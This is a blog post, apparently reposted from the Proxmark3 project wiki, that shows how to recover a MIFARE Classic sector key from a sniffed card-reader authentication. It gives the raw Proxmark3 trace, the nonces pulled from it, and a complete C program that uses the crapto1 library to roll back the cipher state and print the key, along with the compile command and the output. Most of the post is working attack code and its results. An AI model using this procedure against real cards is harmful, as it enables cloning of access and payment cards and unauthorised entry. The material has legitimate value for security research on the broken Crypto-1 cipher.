2013年2月28日星期四

Getting the sector key of a mifare card

Getting the sector key of a mifare card

Author : xfpga Date : 2012-12-12 12:28:59

Getting the sector key of a mifare card(from google code of proxmark3)

Snooping on Mifare communications

This is a working example of how the sector keys of mifare cards can be retrieved with a Proxmark3, using the "crapto-1" package found on Google Code.
The trace below is taken from a hi14asnoop session followed by hf 14a list to get the beginning of the authentication & encryption protocol :

CommandsComment
+ 561882 : 1 : 26REQA
+ 64 : 2 : TAG 04 00Answer reqa
+ 10217 : 2 : 93 20Select
+ 64 : 5 : TAG 9c 59 9b 32 6cThe card’s UID is therefore : 9c 59 9b 32
+ 12313 : 9 : 93 70 9c 59 9b 32 6c 6b 30Select with UID
+ 64 : 3 : TAG 08 b6 ddTag type (Mifare 1K)
+ 923318 : 4 : 60 00 f5 7bAUTH (block 00)
+ 112 : 4 : TAG 82 a4 16 6cTag challenge (nt, "Nonce Tag")
+ 6985 : 8 : a1 e4 ! 58 ce ! 6e ea ! 41 e0 !nr XOR ks1 (Nonce Reader, encrypted, 4 bytes), 
ar XOR ks2 (Answer Reader to Nonce Tag, encrypted)
+ 64 : 4 : TAG 5c ! ad f4 39 !at XOR ks3 (Answer Tag, encrypted)

In order to extract the key for sector 0 from the exchange, we need the following elements :
  • Tag UID
  • Tag challenge (nt)
  • Reader challenge, encrypted (nr xor ks1, aka nr)
  • Reader response, encrypted (ar XOR ks2, aka ar)
  • Tag response, encrypted (at XOR ks3, aka at)
In the example above :
  • UID : 0x9c599b32
  • nt : 0x82a4166c
  • nr : 0xa1e458ce
  • ar : 0x6eea41e0
  • at : 0x5cadf439
Those can then be used in the following "crapto1" test program :
// Test-file: test2.c
#include "crapto1.h"
#include <stdio.h>
int main (void)
{
 struct Crypto1State *revstate;
 uint64_t lfsr;
 unsigned char* plfsr = (unsigned char*)&lfsr;


 uint32_t uid                = 0x9c599b32;
 uint32_t tag_challenge      = 0x82a4166c;
 uint32_t nr_enc             = 0xa1e458ce;
 uint32_t reader_response    = 0x6eea41e0;
 uint32_t tag_response       = 0x5cadf439;

 uint32_t ks2                = reader_response ^ prng_successor(tag_challenge, 64);
 uint32_t ks3                = tag_response ^ prng_successor(tag_challenge, 96);

 printf("nt': %08x\n",prng_successor(tag_challenge, 64));
 printf("nt'': %08x\n",prng_successor(tag_challenge, 96));

 printf("ks2: %08x\n",ks2);
 printf("ks3: %08x\n",ks3);

 revstate = lfsr_recovery(ks2, ks3);
 lfsr_rollback(revstate, 0, 0);
 lfsr_rollback(revstate, 0, 0);
 lfsr_rollback(revstate, nr_enc, 1);
 lfsr_rollback(revstate, uid ^ tag_challenge, 0);
 crypto1_get_lfsr(revstate, &lfsr);
 printf("Found Key: [%02x %02x %02x %02x %02x %02x]\n\n",plfsr[0],plfsr[1],plfsr[2],plfsr[3],plfsr[4],plfsr[5]);

 return 0;
}
Then compiled with :
#gcc -o test2 test2.c crapto1.c crypto1.c
And run like this :
./test2
nt': 8d65734b
nt'': 9a427b20
ks2: e38f32ab
ks3: c6ef8f19
Found Key: [ff ff ff ff ff ff]


you can use the gui soft to do so, it is the same.

没有评论:

发表评论